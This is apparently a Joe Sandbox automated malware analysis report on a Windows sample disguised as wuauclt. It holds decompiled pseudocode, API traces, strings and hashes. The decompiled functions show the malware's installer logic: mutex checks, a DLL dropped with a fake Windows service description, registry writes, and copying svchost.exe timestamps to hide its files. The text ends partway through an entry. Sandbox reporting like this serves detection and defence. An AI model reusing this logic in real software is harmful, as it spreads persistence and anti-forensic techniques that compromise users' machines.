                                                • GetSystemDirectoryA.KERNEL32 ref: 0025561B
                                                • DeleteFileA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,0000001A,?,00000000), ref: 002557EE
                                                • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00255804
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0000001A,?,00000000), ref: 00255810
                                                • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location,00000000,00000000,00000000,000F003F,00000000,00000000,?), ref: 00255875
                                                • RegSetValueExA.KERNELBASE(00000000,LastBackup,00000000,00000003,?,00000380), ref: 00255893
                                                • RegCloseKey.ADVAPI32(00000000), ref: 002558A3
                                                • RegCloseKey.ADVAPI32(00000000), ref: 002558C7
                                                Strings
                                                • %s%s%s, xrefs: 00255562
                                                • %s\%s.%s, xrefs: 0025575F
                                                • , xrefs: 00255395
                                                • msvc, xrefs: 0025562E
                                                • , xrefs: 00255644
                                                • Provides management services: %s, which confirms the signatures of Windows files and allows new programs to be installed. If this service is stopped, these management services will not function properly. If this service is disabled, any services that explicitl, xrefs: 0025582E
                                                • %s %s %s, xrefs: 00255579
                                                • Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location, xrefs: 0025586B
                                                • , xrefs: 002554E3
                                                • LastBackup, xrefs: 00255888
                                                • , xrefs: 002551E5
                                                • , xrefs: 002552E9
                                                • , xrefs: 0025543C
                                                • %s\%s.dll, xrefs: 00255734
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Close$Service$Handle$CreateFileOpen$DeleteDirectoryManagerQueryStatusSystemValue
                                                • String ID: $ $ $ $ $ $%s %s %s$%s%s%s$%s\%s.%s$%s\%s.dll$LastBackup$Provides management services: %s, which confirms the signatures of Windows files and allows new programs to be installed. If this service is stopped, these management services will not function properly. If this service is disabled, any services that explicitl$Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location$msvc
                                                • API String ID: 468037261-3896663686
                                                • Opcode ID: 3da782eaeb7058139acba702b907d9570612e0d6a2020561b085d6e850e7ab9a
                                                • Instruction ID: 400861fb4dbd197eeec58dff901e5f3e5cb92e5f4f6ced61e52c7431ec9b960e
                                                • Opcode Fuzzy Hash: 3da782eaeb7058139acba702b907d9570612e0d6a2020561b085d6e850e7ab9a
                                                • Instruction Fuzzy Hash: 131290F19202289AEB21DF54CC49BEDB778BB01309F1042D9EA58A72C1DB755A8DCF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 57%
                                                			E00256960(void* __ebx, void* __edi) {
                                                				signed int _v8;
                                                				char _v276;
                                                				struct _SECURITY_ATTRIBUTES* _v280;
                                                				char _v308;
                                                				short _v312;
                                                				intOrPtr _v316;
                                                				intOrPtr _v320;
                                                				char _v336;
                                                				char _v852;
                                                				char _v916;
                                                				char _v1044;
                                                				char _v1172;
                                                				char _v1236;
                                                				char _v1240;
                                                				char _v1244;
                                                				void* __esi;
                                                				signed int _t38;
                                                				void* _t42;
                                                				signed int _t44;
                                                				intOrPtr _t49;
                                                				intOrPtr _t55;
                                                				intOrPtr _t58;
                                                				intOrPtr _t59;
                                                				intOrPtr _t60;
                                                				intOrPtr _t62;
                                                				void* _t68;
                                                				intOrPtr _t69;
                                                				intOrPtr _t71;
                                                				char* _t81;
                                                				intOrPtr* _t87;
                                                				void* _t94;
                                                				void* _t96;
                                                				void* _t100;
                                                				signed int _t101;
                                                				signed int _t103;
                                                				signed int _t104;
                                                
                                                				_t75 = __ebx;
                                                				_t103 = (_t101 & 0xfffffff8) - 0x4d8;
                                                				_t38 =  *0x271004; // 0x80aab37c
                                                				_v8 = _t38 ^ _t103;
                                                				_push(__edi); // executed
                                                				FreeConsole(); // executed
                                                				asm("movaps xmm0, [0x26eee0]");
                                                				_t99 = 0;
                                                				_v320 = 0x44372d30;
                                                				asm("movups [esp+0x3a0], xmm0");
                                                				_v316 = 0x4e393837;
                                                				_v312 = 0x7d;
                                                				_t42 = CreateMutexA(0, 1,  &_v336); // executed
                                                				_t96 = _t42;
                                                				_t44 = GetLastError() & 0xffffff00 | _t43 == 0x000000b7;
                                                				if(_t96 == 0) {
                                                					L3:
                                                					_t99 = 0x16;
                                                					goto L4;
                                                				} else {
                                                					if(_t44 == 0) {
                                                						_t49 = E002568A0(_t96, 0, __eflags); // executed
                                                						__eflags = _t49;
                                                						if(_t49 != 0) {
                                                							E002596C0(_t96,  &_v276, 0, 0x104);
                                                							GetModuleFileNameA(0,  &_v276, 0x104);
                                                							_v1244 = 0;
                                                							_v1240 = 0;
                                                							_t55 = E00256610(__ebx,  &_v276,  &_v1240, _t96,  &_v1244); // executed
                                                							_t103 = _t103 + 0x10;
                                                							__eflags = _t55;
                                                							if(_t55 != 0) {
                                                								E002596C0(_t96,  &_v1236, 0, 0x380);
                                                								_t103 = _t103 + 0xc;
                                                								_t58 = E002558E0(__ebx,  &_v1236, _t96, __eflags); // executed
                                                								__eflags = _t58;
                                                								if(_t58 != 0) {
                                                									_t59 = E00255C40( &_v1044,  &_v1172);
                                                									__eflags = _t59;
                                                									if(_t59 != 0) {
                                                										_t81 =  &_v1044;
                                                										_t60 = E00256240(_t81, _v1240, _v1244); // executed
                                                										_t103 = _t103 + 4;
                                                										__eflags = _t60;
                                                										if(__eflags != 0) {
                                                											_push(_t81);
                                                											_t62 = E00255DA0(__ebx,  &_v1044,  &_v1172, __eflags,  &_v1236); // executed
                                                											_t103 = _t103 + 8;
                                                											__eflags = _t62;
                                                											if(_t62 != 0) {
                                                												E00255B10( &_v1044, _t96); // executed
                                                												E00255B10( &_v1172, _t96); // executed
                                                												E00257040( &_v1236, __eflags,  &_v916,  &_v852); // executed
                                                												_t103 = _t103 + 8;
                                                												Sleep(0x1388); // executed
                                                												_t68 = E00254AE0(_t75,  &_v1236, _t96);
                                                												__eflags = _t68 - 4;
                                                												if(_t68 == 4) {
                                                													asm("xorps xmm0, xmm0");
                                                													_v308 = 0x435049;
                                                													_t34 =  &_v308; // 0x435049
                                                													_t87 = _t34;
                                                													asm("movq [esp+0x3c4], xmm0");
                                                													asm("movups [esp+0x3b4], xmm0");
                                                													_v280 = 0;
                                                													_t94 = _t87 + 1;
                                                													do {
                                                														_t69 =  *_t87;
                                                														_t87 = _t87 + 1;
                                                														__eflags = _t69;
                                                													} while (_t69 != 0);
                                                													_t37 =  &_v308; // 0x435049
                                                													_t71 = E002559D0("IPC", _t37, _t87 - _t94); // executed
                                                													_t103 = _t103 + 0xc;
                                                													__eflags = _t71;
                                                													if(_t71 == 0) {
                                                														goto L4;
                                                													} else {
                                                														_push("Install_Done"); // executed
                                                														E00256760(_t75, _t96, 0); // executed
                                                														_t104 = _t103 + 4;
                                                													}
                                                												} else {
                                                													_t99 = 0x58;
                                                													goto L4;
                                                												}
                                                											} else {
                                                												_t99 = 0x4d;
                                                												goto L4;
                                                											}
                                                										} else {
                                                											_t99 = 0x42;
                                                											goto L4;
                                                										}
                                                									} else {
                                                										_t99 = 0x37;
                                                										goto L4;
                                                									}
                                                								} else {
                                                									_t99 = 0x2c;
                                                									goto L4;
                                                								}
                                                							} else {
                                                								_t99 = 0x21;
                                                								goto L4;
                                                							}
                                                						} else {
                                                							_t99 = 0x17;
                                                							L4:
                                                							_push(_t99);
                                                							_push("Error_%d");
                                                							E00256760(_t75, _t96, _t99);
                                                							_t104 = _t103 + 8; // executed
                                                						}
                                                					} else {
                                                						ReleaseMutex(_t96);
                                                						CloseHandle(_t96);
                                                						goto L3;
                                                					}
                                                				}
                                                				E002562A0(_t96, _t99); // executed
                                                				_pop(_t100);
                                                				return E00257097(_v8 ^ _t104, _t100); // executed
                                                			}

                                                0x00000000
                                                0x00256bc7
                                                0x00256bc7
                                                0x00256bcc
                                                0x00256bd1
                                                0x00256bd1
                                                0x00256b65
                                                0x00256b65
                                                0x00000000
                                                0x00256b65
                                                0x00256b0d
                                                0x00256b0d
                                                0x00000000
                                                0x00256b0d
                                                0x00256ae6
                                                0x00256ae6
                                                0x00000000
                                                0x00256ae6
                                                0x00256ac1
                                                0x00256ac1
                                                0x00000000
                                                0x00256ac1
                                                0x00256aa3
                                                0x00256aa3
                                                0x00000000
                                                0x00256aa3
                                                0x00256a78
                                                0x00256a78
                                                0x00000000
                                                0x00256a78
                                                0x00256a21
                                                0x00256a21
                                                0x002569ef
                                                0x002569ef
                                                0x002569f0
                                                0x002569f5
                                                0x002569fa
                                                0x002569fa
                                                0x002569dc
                                                0x002569dd
                                                0x002569e4
                                                0x00000000
                                                0x002569e4
                                                0x002569da
                                                0x002569fd
                                                0x00256a0c
                                                0x00256a17

                                                APIs
                                                • FreeConsole.KERNELBASE ref: 0025697C
                                                • CreateMutexA.KERNELBASE(?,?,00000000), ref: 002569BE
                                                • GetLastError.KERNEL32(?,?,00000000), ref: 002569C6
                                                • ReleaseMutex.KERNEL32(00000000,?,?,00000000), ref: 002569DD
                                                • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 002569E4
                                                  • Part of subcall function 002559D0: RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location,00000000,00000000,00000000,000F003F,00000000,00000000,?), ref: 00255A03
                                                  • Part of subcall function 002559D0: RegSetValueExA.KERNELBASE(00000000,00000001,00000000,00000003,?,?), ref: 00255A1C
                                                  • Part of subcall function 002559D0: RegCloseKey.ADVAPI32(00000000), ref: 00255A29
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 00256A4E
                                                • Sleep.KERNELBASE(00001388), ref: 00256B51
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: CloseCreateMutex$ConsoleErrorFileFreeHandleLastModuleNameReleaseSleepValue
                                                • String ID: 0-7D$789N$Error_%d$IPC$IPC$Install_Done$}
                                                • API String ID: 3982608030-489000174
                                                • Opcode ID: a62327d9140d9f74a92b40071f426d1eb8a6a6eb69fada363683d70574792a95
                                                • Instruction ID: bd47fbe89e7e7a31ada006f732fa10f0b05a701fe534773bc1628e8590d1db43
                                                • Opcode Fuzzy Hash: a62327d9140d9f74a92b40071f426d1eb8a6a6eb69fada363683d70574792a95
                                                • Instruction Fuzzy Hash: FC510B714283418BD720DF50E959BEB73ACAF9030AF40482EFD8963191EBB05A5CCB97
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 89%
                                                			E00255B10(CHAR* __ecx, void* __edi) {
                                                				signed int _v8;
                                                				char _v276;
                                                				struct _FILETIME _v284;
                                                				struct _FILETIME _v292;
                                                				struct _FILETIME _v300;
                                                				void* __esi;
                                                				signed int _t19;
                                                				void* _t21;
                                                				intOrPtr _t27;
                                                				char _t28;
                                                				intOrPtr _t29;
                                                				intOrPtr _t30;
                                                				char _t31;
                                                				void* _t33;
                                                				intOrPtr* _t50;
                                                				void* _t55;
                                                				signed int _t57;
                                                
                                                				_t19 =  *0x271004; // 0x80aab37c
                                                				_v8 = _t19 ^ _t57;
                                                				_t21 = CreateFileA(__ecx, 0xc0000000, 3, 0, 3, 0x80, 0); // executed
                                                				_t56 = _t21;
                                                				if(_t56 == 0xffffffff) {
                                                					L6:
                                                					return E00257097(_v8 ^ _t57, _t56);
                                                				} else {
                                                					E002596C0(CreateFileA,  &_v276, 0, 0x104);
                                                					GetSystemDirectoryA( &_v276, 0x104);
                                                					_t50 =  &_v276 - 1;
                                                					asm("o16 nop [eax+eax]");
                                                					do {
                                                						_t27 =  *((intOrPtr*)(_t50 + 1));
                                                						_t50 = _t50 + 1;
                                                					} while (_t27 != 0);
                                                					_t28 = "\\svchost.exe"; // 0x6376735c
                                                					 *_t50 = _t28;
                                                					_t29 = M0026EC8C; // 0x74736f68
                                                					 *((intOrPtr*)(_t50 + 4)) = _t29;
                                                					_t30 =  *0x26ec90; // 0x6578652e
                                                					 *((intOrPtr*)(_t50 + 8)) = _t30;
                                                					_t31 =  *0x26ec94; // 0x0
                                                					 *((char*)(_t50 + 0xc)) = _t31;
                                                					_t33 = CreateFileA( &_v276, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                					_t55 = _t33;
                                                					if(_t55 != 0xffffffff) {
                                                						GetFileTime(_t55,  &_v300,  &_v292,  &_v284);
                                                						SetFileTime(_t56,  &_v300,  &_v292,  &_v284); // executed
                                                						_t56 = CloseHandle;
                                                						CloseHandle(CloseHandle);
                                                						CloseHandle(_t55);
                                                						goto L6;
                                                					} else {
                                                						CloseHandle(_t56);
                                                						return E00257097(_v8 ^ _t57, _t56);
                                                					}
                                                				}
                                                			}

                                                APIs
                                                • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00255B3E
                                                • GetSystemDirectoryA.KERNEL32 ref: 00255B6D
                                                • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00255BC2
                                                • CloseHandle.KERNEL32(00000000), ref: 00255BCC
                                                • GetFileTime.KERNEL32(00000000,?,?,?), ref: 00255BF8
                                                • SetFileTime.KERNELBASE(00000000,?,?,?), ref: 00255C14
                                                • CloseHandle.KERNEL32(00000000), ref: 00255C21
                                                • CloseHandle.KERNEL32(00000000), ref: 00255C24
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: File$CloseHandle$CreateTime$DirectorySystem
                                                • String ID: \svchost.exe
                                                • API String ID: 2251316602-2416354339
                                                • Opcode ID: 2138cd69d91255b4ceae746fe3245b052a45f8aa07cb3863646316d06904dc48
                                                • Instruction ID: 1698375d326685a8626bd52858ae1ca3f8e082cebd0abca61f39cef9b2b564ef
                                                • Opcode Fuzzy Hash: 2138cd69d91255b4ceae746fe3245b052a45f8aa07cb3863646316d06904dc48
                                                • Instruction Fuzzy Hash: 5331C67290011CAFDB11DF64EC45FE9B7BCAB08314F14419AF608E71D1DAB1AA99CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 80%
                                                			E00254880(void* __ecx, void** _a4, long* _a8) {
                                                				void* _v8;
                                                				long _v12;
                                                				signed int _v16;
                                                				char _v20;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* _t42;
                                                				long _t48;
                                                				void* _t49;
                                                				long _t58;
                                                				long _t59;
                                                				void* _t60;
                                                				long _t63;
                                                				void* _t76;
                                                				void* _t78;
                                                				long* _t79;
                                                				long _t88;
                                                				intOrPtr _t91;
                                                				intOrPtr* _t94;
                                                				void* _t99;
                                                				void* _t100;
                                                
                                                				_v8 = 0;
                                                				_v12 = 0;
                                                				_t42 = E002547A0(__ecx,  &_v8,  &_v12); // executed
                                                				_t100 = _t99 + 4;
                                                				if(_t42 != 0) {
                                                					_t88 = _v12;
                                                					_t76 = 0;
                                                					_v16 = 0;
                                                					__eflags = _t88;
                                                					if(__eflags <= 0) {
                                                						L12:
                                                						LocalFree(_v8); // executed
                                                						return _v16;
                                                					} else {
                                                						_push(_t94);
                                                						while(1) {
                                                							_t94 = E002570A8(_t94, __eflags, 0x58);
                                                							_v20 = _t94;
                                                							_v20 = _t94;
                                                							E002596C0(_t88, _t94, 0, 0x58);
                                                							_t100 = _t100 + 0x10;
                                                							asm("movups xmm0, [ebx+eax]");
                                                							asm("movups [esi], xmm0");
                                                							asm("movups xmm0, [ebx+eax+0x10]");
                                                							asm("movups [esi+0x10], xmm0");
                                                							asm("movups xmm0, [ebx+eax+0x20]");
                                                							asm("movups [esi+0x20], xmm0");
                                                							asm("movups xmm0, [ebx+eax+0x30]");
                                                							asm("movups [esi+0x30], xmm0");
                                                							asm("movups xmm0, [ebx+eax+0x40]");
                                                							_t78 = _t76 + 0x50;
                                                							asm("movups [esi+0x40], xmm0");
                                                							__eflags =  *_t94 - 0x20e;
                                                							if( *_t94 == 0x20e) {
                                                								break;
                                                							}
                                                							_t76 = _t78 +  *(_t94 + 0x38) +  *(_t94 + 0xc);
                                                							__eflags = _t76 - _t88;
                                                							if(__eflags < 0) {
                                                								continue;
                                                							} else {
                                                								LocalFree(_v8);
                                                								return _v16;
                                                							}
                                                							goto L13;
                                                						}
                                                						_t48 =  *(_t94 + 0xc);
                                                						_v12 = _t48;
                                                						_t49 = LocalAlloc(0x40, _t48); // executed
                                                						 *(_t94 + 0x50) = _t49;
                                                						 *((intOrPtr*)(_t94 + 0x54)) = LocalAlloc(0x40,  *(_t94 + 0x38));
                                                						E00267820( *(_t94 + 0x50), _v8 + _t78, _v12);
                                                						E00267820( *((intOrPtr*)(_t94 + 0x54)), _v12 + _t78 + _v8,  *(_t94 + 0x38));
                                                						_t58 = E00254670( &_v20);
                                                						__eflags = _t58;
                                                						if(_t58 == 0) {
                                                							L11:
                                                							goto L12;
                                                						} else {
                                                							_t91 = _v20;
                                                							_t79 = _a8;
                                                							_t59 =  *(_t91 + 8);
                                                							 *_t79 = _t59; // executed
                                                							_t60 = LocalAlloc(0x40, _t59); // executed
                                                							 *_a4 = _t60;
                                                							E002596C0(_t91, _t60, 0,  *(_t91 + 8));
                                                							_t63 = E00251000(_t60, _t79,  *((intOrPtr*)(_t91 + 0x50)), _v12);
                                                							__eflags = _t63;
                                                							if(_t63 == 0) {
                                                								__eflags =  *_t79 -  *(_t91 + 8);
                                                								_t66 =  ==  ? 1 : _v16 & 0x000000ff;
                                                								_v16 =  ==  ? 1 : _v16 & 0x000000ff;
                                                								goto L11;
                                                							} else {
                                                								LocalFree( *_a4);
                                                								LocalFree(_v8);
                                                								return _v16;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					return _t42;
                                                				}
                                                				L13:
                                                			}

                                                APIs
                                                  • Part of subcall function 002547A0: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002547BD
                                                • new.LIBCMT ref: 002548C2
                                                • LocalFree.KERNEL32(00000000), ref: 00254925
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: CreateFileFreeLocal
                                                • String ID:
                                                • API String ID: 3879352100-0
                                                • Opcode ID: 4923ff63a2d72cdd8e5ddd9fac8a382738af571e11c54f7ea4c6c34fc51a159a
                                                • Instruction ID: d01de24b38d1d2b471cc5205bec0b0d452474227f332ae68ef344c810783de14
                                                • Opcode Fuzzy Hash: 4923ff63a2d72cdd8e5ddd9fac8a382738af571e11c54f7ea4c6c34fc51a159a
                                                • Instruction Fuzzy Hash: 4251E031D00748EBDB109FA8DC45AAEFBB4FF48309F044594ED48A7212D771AAA8CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 290 2547a0-2547c8 CreateFileA 291 2547d1-254801 GetFileSizeEx LocalAlloc 290->291 292 2547ca-2547d0 290->292 293 254803-254811 CloseHandle 291->293 294 254812-254820 291->294 295 254822-25483e ReadFile 294->295 296 25484e-254852 294->296 297 254840-254849 295->297 298 25484b 295->298 299 254854-25486c CloseHandle LocalFree 296->299 300 25486d-25487a FindCloseChangeNotification 296->300 297->295 297->298 298->296
                                                C-Code - Quality: 67%
                                                			E002547A0(CHAR* __ecx, void** __edx, struct _OVERLAPPED** _a4) {
                                                				void** _v8;
                                                				long _v12;
                                                				long _v16;
                                                				struct _OVERLAPPED* _v20;
                                                				long _v24;
                                                				void* _t15;
                                                				void* _t17;
                                                				long _t18;
                                                				long _t26;
                                                				void* _t30;
                                                				void** _t32;
                                                				struct _OVERLAPPED** _t36;
                                                				void* _t38;
                                                				long _t39;
                                                
                                                				_v8 = __edx;
                                                				_t15 = CreateFileA(__ecx, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                				_t30 = _t15;
                                                				if(_t30 != 0xffffffff) {
                                                					_v24 = 0;
                                                					_v20 = 0;
                                                					__imp__GetFileSizeEx(_t30,  &_v24, _t38);
                                                					_t39 = _v24;
                                                					_v16 = _t39;
                                                					_t17 = LocalAlloc(0x40, _t39); // executed
                                                					_t32 = _v8;
                                                					 *_t32 = _t17;
                                                					if(_t17 != 0) {
                                                						_t36 = _a4;
                                                						_t18 = _t39;
                                                						 *_t36 = 0;
                                                						if(_t18 > 0) {
                                                							while(1) {
                                                								_v12 = 0;
                                                								ReadFile(_t30,  *_t32, _t39,  &_v12, 0); // executed
                                                								_t26 = _v12;
                                                								if(_t26 == 0) {
                                                									break;
                                                								}
                                                								 *_t36 =  *_t36 + _t26;
                                                								_t39 = _t39 - _t26;
                                                								_t32 = _v8;
                                                								if(_t39 > 0) {
                                                									continue;
                                                								}
                                                								break;
                                                							}
                                                							_t18 = _v16;
                                                						}
                                                						_push(_t30);
                                                						if( *_t36 == _t18) {
                                                							FindCloseChangeNotification(); // executed
                                                							return 1;
                                                						} else {
                                                							CloseHandle();
                                                							LocalFree( *_v8);
                                                							return 0; // executed
                                                						}
                                                					} else {
                                                						CloseHandle(_t30);
                                                						return 0;
                                                					}
                                                				} else {
                                                					return 0;
                                                				}
                                                			}


















                                                APIs
                                                • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002547BD
                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002547E5
                                                • LocalAlloc.KERNELBASE(00000040,00000000,?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002547F4
                                                • CloseHandle.KERNEL32(00000000,?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00254804
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: File$AllocCloseCreateHandleLocalSize
                                                • String ID:
                                                • API String ID: 966313076-0
                                                • Opcode ID: df54ca82ec0148107ba679ade653d357ecd3af3f31bab97b10efa1ee7e79c087
                                                • Instruction ID: 6e4b37cd0fdac656214a67e729daafaf50b3a12e1659da2c1a69e951fc450818
                                                • Opcode Fuzzy Hash: df54ca82ec0148107ba679ade653d357ecd3af3f31bab97b10efa1ee7e79c087
                                                • Instruction Fuzzy Hash: 8D217171900219EBDF109FA8EC49BDABBBCFB05315F204195FD04E3291DB715994DB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 301 256160-25618a CreateFileA 302 2561c4-2561cc 301->302 303 25618c-2561bb GetFileSizeEx LocalAlloc 301->303 304 2561cd-2561da 303->304 305 2561bd-2561be CloseHandle 303->305 306 25620c-25620f 304->306 307 2561dc 304->307 305->302 308 256211-25622a CloseHandle LocalFree 306->308 309 25622b-256239 FindCloseChangeNotification 306->309 310 2561e0-2561fc ReadFile 307->310 311 2561fe-256207 310->311 312 256209 310->312 311->310 311->312 312->306
                                                C-Code - Quality: 67%
                                                			E00256160(CHAR* __ecx, void** __edx, struct _OVERLAPPED** _a4) {
                                                				void** _v12;
                                                				long _v16;
                                                				long _v20;
                                                				struct _OVERLAPPED* _v28;
                                                				long _v32;
                                                				void* _t15;
                                                				void* _t18;
                                                				long _t19;
                                                				long _t27;
                                                				void* _t29;
                                                				void** _t31;
                                                				struct _OVERLAPPED** _t34;
                                                				long _t35;
                                                
                                                				_v12 = __edx;
                                                				_t15 = CreateFileA(__ecx, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                				_t29 = _t15;
                                                				if(_t29 == 0xffffffff) {
                                                					L3:
                                                					return 0;
                                                				} else {
                                                					_v32 = 0;
                                                					_v28 = 0;
                                                					__imp__GetFileSizeEx(_t29,  &_v32);
                                                					_t35 = _v32;
                                                					_v20 = _t35;
                                                					_t18 = LocalAlloc(0x40, _t35); // executed
                                                					_t31 = _v12;
                                                					 *_t31 = _t18;
                                                					if(_t18 != 0) {
                                                						_t34 = _a4;
                                                						_t19 = _t35;
                                                						 *_t34 = 0;
                                                						if(_t19 > 0) {
                                                							while(1) {
                                                								_v16 = 0;
                                                								ReadFile(_t29,  *_t31, _t35,  &_v16, 0); // executed
                                                								_t27 = _v16;
                                                								if(_t27 == 0) {
                                                									break;
                                                								}
                                                								 *_t34 =  *_t34 + _t27;
                                                								_t35 = _t35 - _t27;
                                                								_t31 = _v12;
                                                								if(_t35 > 0) {
                                                									continue;
                                                								}
                                                								break;
                                                							}
                                                							_t19 = _v20;
                                                						}
                                                						_push(_t29);
                                                						if( *_t34 == _t19) {
                                                							FindCloseChangeNotification(); // executed
                                                							return 1;
                                                						} else {
                                                							CloseHandle();
                                                							LocalFree( *_v12);
                                                							return 0; // executed
                                                						}
                                                					} else {
                                                						CloseHandle(_t29);
                                                						goto L3;
                                                					}
                                                				}
                                                			}

















                                                APIs
                                                • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0025617F
                                                • GetFileSizeEx.KERNEL32(00000000,?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0025619F
                                                • LocalAlloc.KERNELBASE(00000040,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002561AE
                                                • CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002561BE
                                                • ReadFile.KERNELBASE(00000000,?,00000000,?,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002561F1
                                                • CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00256211
                                                • LocalFree.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0025621C
                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0025622B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: CloseFile$HandleLocal$AllocChangeCreateFindFreeNotificationReadSize
                                                • String ID:
                                                • API String ID: 4148216468-0
                                                • Opcode ID: 2a1b928d30cd4bbac15f3cd26728e518a296ddbe1fb21f2d03d0c4261a3fe9dc
                                                • Instruction ID: 6f8e5b7895b021ad9469e7c3f1393fe0911bbc5ee6b96c5427c99b8ba52d4a31
